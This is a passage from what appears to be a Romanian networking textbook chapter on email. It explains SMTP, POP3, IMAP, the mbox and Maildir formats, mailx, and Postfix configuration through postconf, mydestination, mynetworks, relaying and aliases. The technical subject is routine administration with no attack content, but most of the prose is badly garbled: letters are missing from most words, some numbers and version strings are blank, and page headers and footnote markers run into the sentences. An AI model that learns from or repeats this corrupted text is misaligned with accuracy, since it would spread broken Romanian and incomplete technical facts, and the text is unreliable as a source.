Î ad ul u ei o u i aţii, u MTA poate ju a ol de se e sau de lie t. “e e a fi a el MTA
ca e p i eşte esajul ia lie t MTA-ul care îl trimite. Serverul de SMTP poate fi cel final
se e ul de ail e ha ge aso iat do e iului desti aţie sau poate a ea ol i te edia :
relay sau gateway. Un server de tip relay este un server care nu este cel fi al şi a t a s ite
esajul ăt e u alt se e . Ma ea pa te a se e elo de e-mail la începutul Internetului erau
de a est tip pe t u ă legătu ile sla e u puteau ga a ta î totdeau a o o e iu e de la su să
la desti aţie. “e e de tip gateway este un server configurat ca server de mail exchange
pentru mai multe domenii care va redirecta mesajele MTA-u ilo efe ti e aso iate fie ă ui
domeniu.
P oto olul “MTP este u p oto ol azat pe stă i. Atât se e ul ât şi lie tul î pa t a eeaşi
iziu e asup a stă ii u e te. O sesiu e este ep eze tată de o e zile i iţiate de lie tul
“MTP şi de ăspu su ile date de se e , su fo a u o odu i u e i e î soţite de u te t
explicativ.
U p oto ol si plu, “MTP foloseşte o e zi te t pe t u o u i a e. Astfel, pentru
spe ifi a ea desti ata ului şi e pedito ului se o folosi o e zile ‘CPT TO, espe ti MAIL
FROM. Alte comenzi utile sunt HELO, DATA, QUIT.
Pe t u a ezol a u ele di t e li ită ile p oto olului “MTP, u ou p oto ol a fost defi it:
ESMTP (Extended SMTP . O dată u a est ou p oto ol, a fost defi ită şi o odalitate de a
dete i a e siu ea de “MTP supo tată de u se e . Astfel, u lie t apa il de E“MTP îşi a
î epe dialogul u se e ul utilizâ d o a da EHLO î lo de HELO. Da ă ăspu sul p i it de
1
RFC 2045-2049
2
RFC 2821
288 | ‘ e ţ e l e L o a l e
la server nu este unul de eroare, clientul va folosi în continuare ESMTP, în caz contrar
revenindu-se la folosirea SMTP.
8.1.3.1 “A“L şi TL“

Fii d u p oto ol si plu, “MTP u a e i teg ată o fa ilitate de aute tifi a e. O i i e poate
trimite mesaje prin conectarea la u se e “MTP. Mai ult, îşi poate as u de foa te uşo
ide titatea. Pe t u a i teg a fa ilităţi de aute tifi a e î “MTP se foloseşte “A“L 1 (Simple
Authentication and Security Layer . “A“L de uplează fo ele de aute tifi a e de apli aţia î
si e şi poate fi folosit u o ga ă a iată de p oto oale.
“A“L pu e la dispoziţia apli aţiei e a is e de aute tifi a e digest, login, plain, one time
password, et . şi u ad u de sto a e a i fo aţiei de aute tifi a e utilizato i, pa ole . Î t -o
conexiune SMTP aute tifi a ea se ealizează p i i te ediul o e zii AUTH di e te sia
SMTP-AUTH2.
“A“L ofe ă se i ii de aute tifi a e da u asigu ă se u itatea i fo aţiei. Nu ele de
utilizatori sau parolele transmise în cadrul sesiunii de autentificare sunt transmise în clar.
Co u i aţia iptată este asigu ată u ajuto ul TL“3 (Transport Layer Security). TLS permite
se u iza ea o u i aţiei folosi d e a is e de ipta e u hei pu li e. Î ge e al, se e ul
SMTP se va autentifica cu ajutorul unui certificat digital, î ti p e lie ţii se o aute tifi a u
u ele di etodele puse la dispoziţie de “A“L.
8.1.4 POP3 (Post Office Protocol)

POP34 este utilizat de apli aţiile de tip MUA pe t u a idi a esajele de poşta ele t o i ă
di ăsuţa poştală message store).
POP3 a fost proiectat pentru a permite utilizatorilor cu conexiuni intermitente (cum sunt
conexiunile dial-up să e t agă esajele de pe se e atu i â d su t o e taţi şi apoi să le
izualizeze şi să lu eze fă ă e esitatea u ei o e iu i. Deşi a ea pa te a lie ţilo de ail
au opţiu ea de a păst a esajele pe se e , î ge e al MUA a e foloses POP se o e tează,
idi ă esajele, le sto hează pe al ulato ul utilizato ului a esaje oi, le şte g de pe se e
şi se de o e tează. Deza a tajul este difi ultatea iti ii a elo aşi esaje di două lo aţii
diferite. În contrast, protocolul IMAP de idi a e a esajelo ele t o i e supo tă atât od de
operare conectat ât şi deconectat.
Dialogul începe prin stabilirea conexiunii la cererea clientului. Serverul a ăspu de u u
esaj de î tâ pi a e. U ează apoi u dialog fo at di o e zi ale lie tului şi ăspu su i
ale se e ului. ‘ăspu sul se e ului i lude u i di ato al stă ii u e te +OK sau -ERR), un
u â t heie şi, e e tual, i fo aţie adiţio ală. La fel a şi “MTP, o e zile POP su t
comenzi text.
După i iţie ea o e iu ii, se a ealiza aute tifi a ea lie tului la se e . Ca şi alte
p oto oale ai e hi di I te et, POP folosea la î eput e a is e de aute tifi a e fă ă
ipta e. Deşi î ă se p a ti ă t a s ite ea de pa ole î la , POP supo tă âte a etode de
aute tifi a e pe t u a fu iza di e se i elu i de p ote ţie î pot i a a esului edo it la
esajele utilizato ului. O astfel de etodă este o a da APOP a e foloseşte MD pe t u
o ţi e ea u ei hei de aute tifi a e. POP supo tă de ase e ea etode de aute tifi a e de
tip IMAP folosi d e te sia AUTH. Î zilele oast e este î să o u să se ipteze t afi ul POP
folosind TSL/SSL.
1
RFC 4422
2
RFC 4954
3
RFC 4346
4
RFC 1939
289 | E - m a i l
8.1.5 IMAP (Internet Message Access Protocol)

Protocolul POP3 este utilizat în special pentru transferarea mesajelor de pe server pe orice
alt calculator pentru a le citi offline. Î azul î a e se do eşte a esa ea u ui si gu o t de
poştă ele t o i ă de la ai ulte lo aţii a asă/ i ou , p oto olul POP este limitat. Acest
dezavantaj a dus la dezvoltarea unui alt protocol, IMAP (Internet Message Access Protocol)1. În
od ase ă ăto u POP , IMAP pe ite t a sfe a ea esajelo ăt e u alt al ulato . Atu i
când IMAP este utilizat în modul online clientul nu t a sfe ă esajele şi i i u le şte ge de pe
se e . Clie tul poate e e î să să p i eas ă a tetele esajelo , a u ite pă ţi di esaje, sau
hia esajele a e se pot i es u ui ite iu de ăuta e. Î ese ţă, IMAP pe ite a e a ea
mesajelor dintr-o ăsuţă poştală aflată pe u se e a şi â d a estea a fi sto ate lo al.
“p e deose i e de POP , p oto olul IMAP ofe ă ai ulte posi ilităţi de p elu a e a
esajelo di ăsuţa poştală. Cea ai i po ta tă a a te isti ă este a esa ea şi a e a ea
mesajelo di e t pe se e . Fii d e ţi ute pe se e , esajele u su t des ă ate de ât la
izualiza ea lo , e istâ d şi opţiu ea des ă ă ii doa a u ei pă ţi di esaj. “p e deose i e de
POP , a a ea esajelo este ult ai fle i ilă. E istă a aje de: Seen (vizualizat),
Answered ăspu s , Flagged (marcat ca fiind urgent), Deleted şte s , Draft (nu a fost
te i ată o pu e ea esajului , Recent (este folosit pentru marcarea mesajelor noi, în
prima sesiune în care sunt vizualizate).
Spre deosebire de POP , u de toate esajele se găses pe se e î t -o si gu ă ăsuţă
poştală inbox), iar directoarele (mailbox u se pot ea de ât î apli aţia lie t MUA ,
protocolul IMAP permite crearea de directoare direct pe server. Utilizând comenzi IMAP,
apli aţia lient poate folosi filtre pentru mutarea mesajelor dintr-u di e to î altul, fă ă să fie
e oie ă a a mailbox-u ile să fie situate pe a elaşi se e .
O altă fa ilitate este posi ilitatea a esă ii o u e te a ăsuţelo poştale, a easta fă â d
posibilă e e tual şi pa taja ea u ei ăsuţe î t e ai ulţi utilizato i.
Cu toate ă fa ilităţile ofe ite de IMAP su t supe ioa e POP , a a tajul p oto olului POP
ă â e a ela al si plităţii şi al esoli ită ii e te si e a esu selo se e ului. Di a este
motive, majoritatea furnizorilor de servicii Internet (ISP) sau e- ail o pu e la dispoziţia
utilizato ilo se i ii POP . De pa tea ealaltă, eţelele lo ale foloses de ulte o i IMAP.
Folosi d IMAP peste o eţea de iteză idi ată, esajele su t a esate imediat, spre deosebire
de e upe a ea a esto a folosi d POP sau a esa ea p i i te ediul u ei i te feţe e .
8.2 Formatul căsuţei poştale

După p i i ea u ui esaj desti at staţiei lo ale, MTA a sto a esajul î t -o intrare din
siste ul lo al de fişie e de u ită ăsuţă poştală, message store sau mail spool. Formatul
ăsuţei poştale t e uie să fie u os ut de lie ţii de e-mail locali care vor citi mesajele sau de
se e ele POP sau IMAP a e o a esa ăsuţa pe t u a li a esajele utilizato ilo .
Deşi a u ite se e e foloses fo ate pa ti ula e pe t u ăsuţa poştală, ele ai î tâl ite
două fo ate su t mbox fo atul t adiţio al şi Maildir (format mai recent).
8.2.1 mbox
Formatul mbox este fo a t adiţio ală de sto a e a esajelo pe u siste U i î t -un
singu fişie aso iat fie ă ui utilizato . Fie a e ou esaj di fişie î epe u o li ie a e î epe
cu From u at de u a a te spaţiu.
1
RFC 2060
290 | ‘ e ţ e l e L o a l e
Formatul mbox este formatul folosit implicit de majoritatea MTA-u ilo . Î od o iş uit,
1
mesajele sunt livrate în directorul /var/spool/mail/$USERNAME . MTA-u ile pot fi, î să,
o figu ate să li eze esajele î t -u fişie de tipul mbox din directorul home al utilizatorului.
Î t u ât fişie ul mbox poate fi a esat si ulta atât de MTA ât şi de se e ul IMAP/POP ,
este necesa ă o fo ă de locking a e să asigu e o siste ţa a esului. Î od e ide t,
locking-ul at age după si e pe aliză i de pe fo a ţă şi difi ultatea i ple e tă ii pe u
siste de fişie e o tat î eţea u a fi NF“ . A este p o le e au fost ele a e au condus
la crearea formatului Maildir.
8.2.2 Maildir
Formatul Maildir se deose eşte de fo atul mbox p i faptul ă u e esită e a is e
de locking pe t u a asigu a i teg itatea esajelo î ti p e esajele su t adăugate, şte se,
mutate. Fiecare mesaj este me ţi ut î t -u fişie sepa at. Modifi ă ile su t ealizate p i
i te ediul ope aţiilo ato i e peste siste ul de fişie e.
Formatul Maildir a fost creat de Daniel J. Bernstein în momentul scrierii serverului qmail.
Directorul Maildir o ţi e t ei su di e toare: tmp, new şi cur, localizate, de obicei, în
cadrul unui director din home-ul utilizatorului:
razvan@anaconda:~$ ls -F /home/razvan/Maildir/
courierimaphieracl/ courierimapsubscribed courierpop3dsizelist new/
courierimapkeywords/ courierimapuiddb cur/ tmp/
Fişie ele di di e to ul new sunt mesaje livrate dar care nu au fost citite. Linia care începe
cu From u ai este e esa ă. După e u esaj este izualizat este utat î di e to ul cur.
Directorul tmp este folosit în mo e tul li ă ii esajelo pe t u a sto a u esaj pâ ă la
scrierea acestuia în directorul new.
8.3 Clienţi de e-mail

Un client de e- ail sau MUA este apli aţia folosită pe t u a t a s ite şi a iti esaje
de poştă ele t o i ă. T a s ite ea p esupu e o ta tarea unui server SMTP iar citirea
î sea ă folosi ea u ui se e IMAP sau POP .
Î zilele oast e lie ţii de e- ail o upă u spe t u la g de fu ţio alităţi, de la lie ţi
î li ie de o a dă alpine, mutt pâ ă la apli aţii i teg ate de tip PIM Personal Information
Manager) (Microsoft Outlook, Novell Evolution sau apli aţii e a e î depli es olul de
client de e-mail (Gmail, Yahoo! Mail).
Fa ilităţile de ază ale u ui lie t de e-mail sunt folosirea POP3/IMAP pentru
des ă a ea/a esa ea esajelo , folosi ea de filt e, folosi ea de se ătu i, aute tifi a ea şi
ipta ea o u i aţiei. P i t e fa ilităţile fu izate de lie ţii de e- ail ode i se u ă ă:
 izualiza ea fi elo de dis uţii
 suport PGP, S/MIME
 etichetarea mesajelor
 corectarea erorilor de g a ati ă
 izualiza ea i agi ilo ataşate image preview , ăuta e i de ată
E e ple de lie ţi de e-mail sunt:
 lie ţi î li ie de o a dă: mailx, mutt, alpine
 lie ţi u i te faţă g afi ă: Microsoft Outlook, Mozilla Thunderbird, Novell Evolution, KMail,
Opera Mail
 lie ţi u i te faţa e webmail): Gmail, Yahoo! Mail, Horde IMP, SquirrelMail
1
http://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard#Directory_structure
291 | E - m a i l
8.3.1 mailx
mailx o e siu e î u ătăţită a mail este u utilita pe t u t a s ite ea şi p i i ea
de mesaje pe sisteme Unix. Este un client de e- ail de ază, lipsit de posibilitatea de citire a
mesajelor de pe alt sistem. Mesajele sunt citite de pe sistemul local.
Deşi u puţi e fu ţio alităţi, mailx poate fi folosit pe t u a e a ea apidă a
mesajelor stocate pe siste ul lo al. Cea ai f e e tă utilizare a mailx este transmiterea de
esaje di e t di li ia de o a dă. A est lu u pe ite folosi ea mailx în majoritatea
s iptu ilo a e auto atizează t i ite ea de esaje de poştă ele t o i ă.
Citirea mesajelor se face interactiv prin invocarea comenzii mailx (sau forma
o pati ilă mail):
alina@anaconda:~$ mail
Mail version 8.1.2 01/15/2001. Type ? for help.
"/var/mail/alina": 24 messages 24 new
>N 1 liviu.dumitrascu@ Sat Jun 9 01:24 178/20754 61 joburi noi pentru tine
N 2 newsletter@9am.ro Sat Jun 9 02:47 960/53849 Casatorii pentru comunitate
N 3 liviu.dumitrascu@ Sat Jun 9 07:46 96/7653 Horoscopul Carierei pentru
N 4 liviu.dumitrascu@ Sun Jun 10 01:06 165/18540 17 joburi noi pentru tine
N 5 newsletter@wall-s Sun Jun 10 02:11 312/41081 Cele mai citite articole di
N 6 newsletter@9am.ro Sun Jun 10 09:25 660/52453 Cele mai citite articole di
N 7 newsletter@wall-s Mon Jun 11 03:20 446/38829 Luni, 11 Iunie - O saptamana
O i e esaj a e u i de şi o sta e: ou, e itit, p opus pe t u a fi şte s, esaj la a e s-a

ăspu s, et . P o ptul ofe it de ail este &. Co e zile posi ile pot fi izualitate p i a ti a ea
ecranului de ajutor (comanda h): t – afişează, d – şte ge, – epli ă.
Invocarea non-i te a ti ă a o e zii pe ite t a s ite ea de esaje. Astfel, da ă se
do eşte t a s ite ea u ui esaj ăt e utilizato ul ana@avatar.com u su ie tul „Fil ul
sapta a ii , se a folosi o a da:
razvan@anaconda:~$ mail -s "Filmul saptamanii" ana@avatar.com
Vii la film miercuri?
.
Cc:
Caracterul . sau opţio al CT‘L-D) î sea ă î heie ea esajului. mailx soli ită
introducerea unui destinatar de tipul Carbon Copy, a e a fost ig o ată.
Da ă esajul este sto at î t -u fişie , se poate folosi u ătoa ea o a dă pe t u
transmiterea sa:
razvan@anaconda:~$ cat hello.txt | mail -s "Filmul saptamanii" ana@avatar.com
A a tajul ulti ei o e zi este lipsa de i te a ti itate. O astfel de o a dă poate fi uşo

i teg ată î s iptu i a e e esită t a s ite ea auto ată a esajelo de poştă ele t o i ă.
8.4 MTA
“e ap e iază ă, î ziua de astăzi, peste % di MTA-u ile e iste te î I te et ulează
Sendmail, Microsoft Exchange Server, Postfix şi Exim.
Sendmail a fost pe t u ultă e e se e ul de e- ail i pli it dato ită dez oltă ii sale
î ă de la î eputul Internetului. Sendmail a fost s is de E i All a la î eputul a ilo .
Ve siu ea a tuală este . . Sendmail nu a fost proiectat cu aspecte de securitate drept
pe t u a e a fost auza a u e oase ata u i pe pa u sul dez oltă ii I te etului.
Problemele de securitate ale Sendmail au condus la crearea Qmail şi Postfix. Qmail, scris
de Daniel J. Bernstein, s-a do it a fi e oluţio a p i p oie ta ea e ţi ea o t de se u itate.
Di pă ate, î epâ d u , Qmail u ai este dez oltat şi u ă ul de siste e e ulează
Qmail a s ăzut.
Postfix a u ă it, de ase e ea, ate t o diţiile e esa e pe t u asigu a ea se u ităţii.
Una dintre deciziile importante a fost abandonarea sistemului monolitic folosit de Sendmail şi
292 | ‘ e ţ e l e L o a l e
folosirea unui sistem modular. Postfix este compus dintr-un set de daemoni cu drepturi
limitate care îndeplinesc diverse sarcini necesare.
Exim foloseşte odelul o oliti al Sendmail fă ă a a ea pa te, î să, de a eeaşi isto ie de
ul e a ilităţi. Cu os â du-se problemele de securitate ale Sendmail, Exim a fost proiectate
pentru a nu suferi de a eleaşi ul e a ilităţi. Aju s la versiunea 4, Exim este MTA cu un nivel
ridicat de configurabilitate. Printre funcţio alităţile a a sate ale Exim se u ă ă folosi ea de
liste de a es şi i teg a ea u ui framework de s a a e a o ţi utului util a filt u a ti i us sau
anti-spam.
În lumea Unix, Sendmail ă â e el ai folosit MTA. Totuşi, difi ultatea î o figu a e,
isto ia de ul e a ilităţi şi e iste ţa u o soluţii p e u Postfix şi Exim a dus la diminuarea
i stală ilo de Sendmail. Î ziua de astăzi, ajo itatea ad i ist ato ilo de siste e o a dă
folosirea Postfix sau Exim.
8.5 Postfix
Apă ut i iţial î ad ul u ui p oie t de ju ătate de a po it de Wietse Ve e a, Postfix a
fost dezvoltat ulterior, dovedindu-se o alte ati ă ai apidă şi ai sigu ă pe t u Sendmail.
Obiectivele de proiectare ale Postfix au fost fia ilitatea, pe fo a ţa, uşu i ţa î utiliza e
şi ad i ist a e şi se u itatea. Postfix pu e la dispoziţia ad i ist ato ului u u ă li itat de
fişie e de o figu a e u di e ti e si ple. Pe t u a fa ilita adopta ea Postfix ca MTA, multe
di t e fişie ele şi o e zile folosite de Sendmail sunt compatibile în Postfix. Comenzi precum
sendmail, newaliases şi fişie e p e u /etc/aliases sau .forward şi-au păst at olul şi î
Postfix.
Problemele majore ale Sendmail au fost cele de securitate. Postfix foloseşte o se ie de
e a is e pe t u asigu a ea se u ităţii. U a di de iziile de p oie ta e i po ta te a fost
modularitatea. În vreme ce Sendmail este un sistem monolitic, folosind un singur executabil cu
drepturi privilegiate pentru executarea sarcinilor, Postfix foloseşte u p o es u d eptu i
li itate pe t u fie a e tip de sa i ă. Fie a e di p o esele Postfix, de u ite şi age ţi, ulează
sub paradigma celui ai i p i ilegiu şi e e ută doa sa i a p op ie: t a s ite e esaj,
sto a e esaj, li a e lo ală, gestiu ea ozii, et . “i gu ul p o es a e ulează u d eptu i
p i ilegiate este p o esul aste a e le po eşte pe toate elelalte. Postfix foloseşte de
asemenea facilitatea de chroot a sistemelor Unix pentru a limita vizibilitatea sistemului de
fişie e pe t u u p o es. De o i ei, p o esele Postfix sunt rulate în jail-ul
/var/spool/postfix.
8.5.1 Arhitectură
8.5.2 Instalare
Pe sistemele Debian-based, Postfix este dispo i il î fo a i a ă î pa hetul postfix.
# apt-get install postfix
Î ad ul p o esului de i stala e t e uie ăspu s la âte a î t e ă i pe t u a se spe ifi a:

1. Tipul serverului. Di opţiu ile dispo i ile No configuration, Internet Site, Internet with
smathost, Satellite system, Local Only), cel mai adesea se va alege Internet Site.
2. Numele serverului. Trebuie specificat sub forma nume.domeniu, de exemplu mail-
test.cs.pub.ro.
După i stala e se spe ifi ă odul î a e se poate alte a o figu aţia u e tă a Postfix şi
vizualizarea valorilor configurate:
Postfix is now set up with a default configuration. If you need to make changes, edit
/etc/postfix/main.cf (and others) as needed. To view Postfix configuration values, see
postconf(1).
293 | E - m a i l
After modifying main.cf, be sure to run '/etc/init.d/postfix reload'.
8.5.3 )nteracţiunea cu Postfix

I te a ţiu ea u se e ul Postfix se poate realiza în mai multe moduri. Ca orice serviciu,
Postfix poate fi oprit, repornit, pornit prin intermediul scripturilor de iniţializa e a siste ului:
cuirass:~# /etc/init.d/postfix stop
Stopping Postfix Mail Transport Agent: postfix.
cuirass:~# /etc/init.d/postfix start
Starting Postfix Mail Transport Agent: postfix.
cuirass:~# /etc/init.d/postfix restart
În plus, comanda postfix poate fi folosită cu acelaşi scop:
cuirass:~# postfix stop
postfix/postfix-script: stopping the Postfix mail system
cuirass:~# postfix start
postfix/postfix-script: starting the Postfix mail system
cuirass:~# postfix reload
postfix/postfix-script: refreshing the Postfix mail system
Pachetul Postfix i stalează alte p og a e utile pe t u o a da şi gestiu ea se e ului

Postfix precum newalisases sau postconf.
8.5.3.1 Jurnalizare
Ve ifi a ea o e titudi ii fu ţio ă ii se e ului Postfix se ealizează, de o i ei, p i
i spe ţia fişie elo de ju aliza e. Î od o iş uit, fişie ele de ju aliza e se găses î
/var/log/mail.*. E istă, de o i ei, fişie e o espu zătoa e dife itelo i elu i de
ju aliza e şi e oa e:


mail.log

mail.info

mail.err
mail.warn
A este fişie e pot fi i spe tate pe t u a e ifi a e esaje su t t a s ise sau pe t u a
e ifi a e o ile apă ute la t a s isia u ui esaj. Cele fişie e o espund nivelurilor de
jurnalizare diferite: erori (.err), avertismente (.warn , i fo aţii .info , ope aţii ju alizate
(.log).
8.5.3.2 Alte comenzi utile

 mailq - afişează i fo aţii desp e esajele di oada de esaje ID, di e siu e, su să,
desti aţie, oti ul pe tru care nu a fost livrat - da ă este azul, et . ;
 postsuper -d queue_id - şte ge esajul ide tifi at de queue_id din coada de mesaje;
pe t u şte ge ea tutu o esajelo se utilizează postsuper -d ALL;
 postqueue -f - fo ţează et i ite ea esajelo di oadă.
8.5.4 Fişiere de configurare

Fişie ele de o figu a e ale Postfix-ului se găses î /etc/postfix, cele mai importante
fiind /etc/postfix/main.cf şi /etc/postfix/master.cf. Fişie ul p i ipal de o figu a e
este /etc/postfix/main.cf. După fie a e odifi a e a a esto fişie e este e esa ă
repornirea serverului:
# /etc/init.d/postfix reload
sau
# postfix reload
294 | ‘ e ţ e l e L o a l e
Fişie ul p i ipal de o figu a e o ţi e di e tive în forma nume = valoare şi afe tează

fu ţio a ea se i iului:
cuirass:~# tail -3 /etc/postfix/main.cf
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
Fişie ul master.cf defi eşte fu ţio a ea daemon-ului master, procesul care

oo do ează po i ea elo lalte p o ese Postfi :
# service type private unpriv chroot wakeup maxproc command + args
# (yes) (yes) (yes) (never) (100)
# ==========================================================================
smtp inet n - - - - smtpd
[...]
pickup fifo n - - 60 1 pickup
cleanup unix n - - - 0 cleanup
8.5.4.1 postconf
Alte a ea fişie ului /etc/postfix/main.cf poate fi ealizată p i i te ediul u ui edito ,
da se e o a dă folosi ea o e zii postconf. Comanda postconf poate fi folosită pe t u
e ifi a ea fişie ului p i ipal de o figu a e, pe t u izualiza ea di e ti elo de o figu a e
sau pentru modificarea unei directive. Directivele care nu sunt configurate în
/etc/postfix/main.cf au o valoare implicită.
Afişa ea o figu aţiei a tuale se ealizează p i ula ea fă ă a gu e te a o e zii
postconf:
cuirass:~# postconf | head -3
2bounce_notice_recipient = postmaster
access_map_reject_code = 554
address_verify_default_transport = $default_transport
Edita ea u ei di e ti e se ealizează p i i te ediul a gu e tului -e:

cuirass:~# postconf mailbox_size_limit
cuirass:~# postconf -e mailbox_size_limit=30000000
cuirass:~# postconf mailbox_size_limit
8.5.5 Configurare de bază

Di e ti ele i po ta te di fişie ul p i ipal de o figu a e afe tează pa a et i p e u
u e de do e iu, i te feţe şi eţele a ti e, supo t TL“ şi “A“L, utilizato i i tuali şi ăsuţe
poştale i tuale.
8.5.5.1 Configurare domenii

Directivele de ază pe t u o figu a ea u elo de do e iu su t myorigin şi
mydestination.
Directiva myorigin spe ifi ă do e iul su să pe t u esajele t a s ise de pe siste ul
local:
cuirass:~# postconf myorigin
myorigin = /etc/mailname
cuirass:~# cat /etc/mailname
cuirass.localdomain
Spre exemplu, în cazul folosirii comenzii mailx, domeniul specificat de myorigin va fi

ataşat la u ele utilizato ului a e a folosit o a da. Î azul de ai sus, da ă utilizato ul ana
transmite un mesaj folosind mailx, expeditorul va fi ana@cuirass.localdomain.
Directiva mydestination spe ifi ă do e iile pe t u a e esajele su t păst ate lo al.
Mesajele destinate utilizatorului test_user@test_domain.com vor fi livrate utilizatorului local
295 | E - m a i l
test_user da ă do e iul test_domain este prezent în cadrul directivei mydestination. Un

server Postfix poate asigu a găzdui e i tuală pe t u ai ulte do e ii p i adăuga ea
acestora în directiva mydestination. Î listi gul de ai jos se o figu ează Postfix pentru a
a epta esaje şi pe t u do e iul test.cs.pub.ro:
cuirass:~# postconf mydestination
mydestination = cuirass.localdomain, localhost.localdomain, , localhost
cuirass:~# postconf -e 'mydestination = cuirass.localdomain, localhost.localdomain, ,
localhost, test.cs.pub.ro'
cuirass:~# postconf mydestination
mydestination = cuirass.localdomain, localhost.localdomain, , localhost, test.cs.pub.ro
Co figu aţia este o pletă da ă e istă şi o apa e î t e u ele de do e iu şi ad esa IP a

siste ului pe a e ulează Postfix. Aceasta se poate realiza printr-o configurare DNS sau,
pe t u testa e lo ală, p i adăuga ea u ei apă i î fişie ul /etc/hosts:
cuirass:~# cat /etc/hosts | grep test
172.16.68.128 test.cs.pub.ro
cuirass:~# ping -c 1 test.cs.pub.ro
PING test.cs.pub.ro (172.16.68.128) 56(84) bytes of data.
64 bytes from test.cs.pub.ro (172.16.68.128): icmp_seq=1 ttl=64 time=1.20 ms
Î a eastă o figu aţie, esajele li ate ăt e a a@lo alhost, a a@lo alhost.lo aldo ai ,
a a@ ui ass.lo aldo ai , a a@test. s.pu . o o aju ge î ăsuţa poştală a utilizatorului ana.
8.5.5.2 Co figurare i terfețe şi porturi

Di e ti a i et_i te fa es p e izează i te feţele pe a e Postfi as ultă o e iu i. I pli it,
Postfi as ultă o e iu i pe toate i te feţele:
cuirass:~# postconf inet_interfaces
Postfi poate fi o figu at să as ulte o e iu i doa pe o i te faţă sau pe âte a i te feţe:

cuirass:~# postconf inet_interfaces
cuirass:~# netstat -tlnp | grep 25
cuirass:~# postconf -e 'inet_interfaces = 127.0.0.1, 172.16.68.128'
tcp 0 0 127.0.0.1:25
Configurarea unui port pe care Postfix să as ulte o e iu i se ealizează p i i te ediul

fişie ului de o figu a e pe t u daemon-ul aste . Astfel, da ă se do eşte a Postfix să as ulte
o e iu i şi pe po tul , se adaugă li ia de ai jos la fişie ul /etc/postfix/master.cf:
2525 inet n - - - - smtpd
După epo i e, Postfix va asculta conexiuni şi pe po tul :

Pe t u a u a ţio a a open relay, Postfix a eptă t a s ite ea de esaje ăt e do e ii

pentru care nu este destinatar doar de la staţii di a u ite eţele. P e iza ea a esto eţele se
ealizează p i i te ediul di e ti ei mynetworks. Mesajele sosite de la staţii di a este eţele
o fi li ate i dife e t de desti aţie. Cele sosite de la staţii di alte eţele o fi li ate local
da ă se e ul este espo sa il de do e iul desti aţie do e iul este aso iat di e ti ei
mynetworks) altfel vor fi respinse.
Î o figu aţia de ai jos:
296 | ‘ e ţ e l e L o a l e
cuirass:~# postconf mynetworks

mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
Postfix va a ţio a a relay doa pe t u esajele t i ise de pe staţia lo ală. Mesaje sosite
di eţea u o fi li ate do e iilo de a e se e ul u este espo sa il.
Î lista ea de ai jos se î ea ă t i ite ea u ui esaj ăt e do e iul gmail.com prin
conectare pe i te faţa . . . . “pe ifi a ea desti ata ului eşuează u p e iza ea
esajului „Relay access denied
cuirass:~# telnet 172.16.68.128 25
Trying 172.16.68.128...
Connected to 172.16.68.128.
Escape character is '^]'.
220 cuirass.localdomain ESMTP Postfix (2.5.5)
EHLO localhost
[...]
MAIL FROM: ana
250 2.1.0 Ok
RCPT TO: razvand@gmail.com
554 5.7.1 <razvand@gmail.com>: Relay access denied
8.5.5.3 Configurare relaying

Da ă se do eşte o figu a ea de do e ii ăt e a e esajul să fie t a s is i dife e t de
su să, se foloseşte di e ti a relay_domains. Di e ti a spe ifi ă do e iile pe t u a e se a
face relay, pe lâ gă do e iile di mydestination.
Î e e plul de ai jos se spe ifi ă do e iul gmail.com ca domeniu pentru care se face
relay:
cuirass:~# postconf relay_domains
relay_domains = $mydestination
cuirass:~# postconf -e 'relay_domains = gmail.com'
Ta elul de ai jos e pli ă odul î a e se ealizează t a s ite ea esajelo î di e se

situaţii:
Rețea sursă î Do e iu desti ație î Do e iu desti ație î Efect
mynetworks mydestination relay_domains
DA Nu o tează Nu o tează Transmitere mesaj
NU DA Nu o tează Li a e lo ală
NU NU DA Transmitere mesaj
NU NU NU Mesaj respins
8.5.6 Configurare utilizatori virtuali şi căsuţe poştale virtuale

Serverul Postfix ofe ă fa ilităţi de găzdui e i tuală, adi ă poate fi o figu at a Mail
Exchange pe t u ai ulte do e ii. Co figu a ea se ealizează p i i te ediul di e ti ei
mydestination.
În plus, Postfix permite configurarea de utilizatori virtuali. Astfel de utilizato i u e istă î
siste şi esajele ăt e a eştia su t li ate fie u o utilizato i lo ali fie u o utilizato i de pe
alt sistem. Pot fi configurate, de asemenea, alias-uri pentru utilizatorii locali astfel încât
mesajele livrate unui utilizator lo al să fie edi e tate altui utilizato sau u ui alt siste .
În fine, Postfix pe ite o figu a ea de utilizato i i tuali a e foloses ăsuţe poştale
i tuale. Altfel spus, pot fi o figu aţi utilizato i a e u au o t î siste şi li se pot aso ia
intră i spe ializate î siste ul lo al de fişie e ep eze tâ d ăsuţele poştale. U utilizato
i tual u a e o t î siste şi i i u a e u di e to home aso iat. A e î să o i t a e î
siste ul lo al de fişie e ep eze tâ d ăsuţa poştală şi poate p i i şi transmite mesaje.
297 | E - m a i l
8.5.6.1 Configurare aliasuri

Co figu a ea ea ai si plă de alias-uri în Postfix se ealizează p i i te faţa o pati ilă
Sendmail. Fişie ul pe t u o figu a ea de alias-uri este /etc/aliases. După edita ea a estui
fişie a ti a ea alias-urilor se ealizează p i i te ediul o e zii newaliases.
Fişie ul a e o st u tu ă de fo a alias: adrese_finale. Adresele finale unde va fi livrat
esajul pot fi sepa ate p i spaţiu sau p i i gulă. Da ă se do eşte a esajele t i ise ăt e
ele a să fie li ate utilizatorului florin şi u ei ad ese e te e se a adăuga î fişie ul
/etc/aliases o linie de forma:
elena: florin extern@example.org
După a e se a ula o a da newaliases:

# newaliases
Utilizatorul elena poate să u e iste î siste .

De multe ori un utilizato u do eşte folosi ea o tului de pe u siste i edi e ta ea
esajelo ăt e u alt o t. A est lu u se ealizează u ajuto ul fişie ului .forward din home-
ul utilizato ului. Astfel, da ă u utilizato do eşte edi e ta ea esajelo di o tul său ăt e
contul extern@example.org, a ea u fişie .forward î a e a adăuga a ea ad esă:
$ cat .forward
extern@example.org
O i e ad esă adăugată ulte io a î se a t a s ite ea esajului şi ăt e a ea ad esă.
8.5.6.2 Configurare utilizatori virtuali pentru domenii multiple

Î azul folosi ii supo tului de găzdui e i tuală, u se e Postfix va servi mai multe
do e ii. De o i ei se a do i a esajele t a s ise ăt e fie a e do e iu să aju gă
altu de a. Astfel, da ă u se e Postfix se eşte do e iiile alfa.com şi beta.com, o e i ţă
poate fi a esajele ăt e info@alfa.com să fie li ate utilizato ului lo al florin iar mesajele
li ate ăt e info@beta.com să fie li ate ad esei extern@example.org.
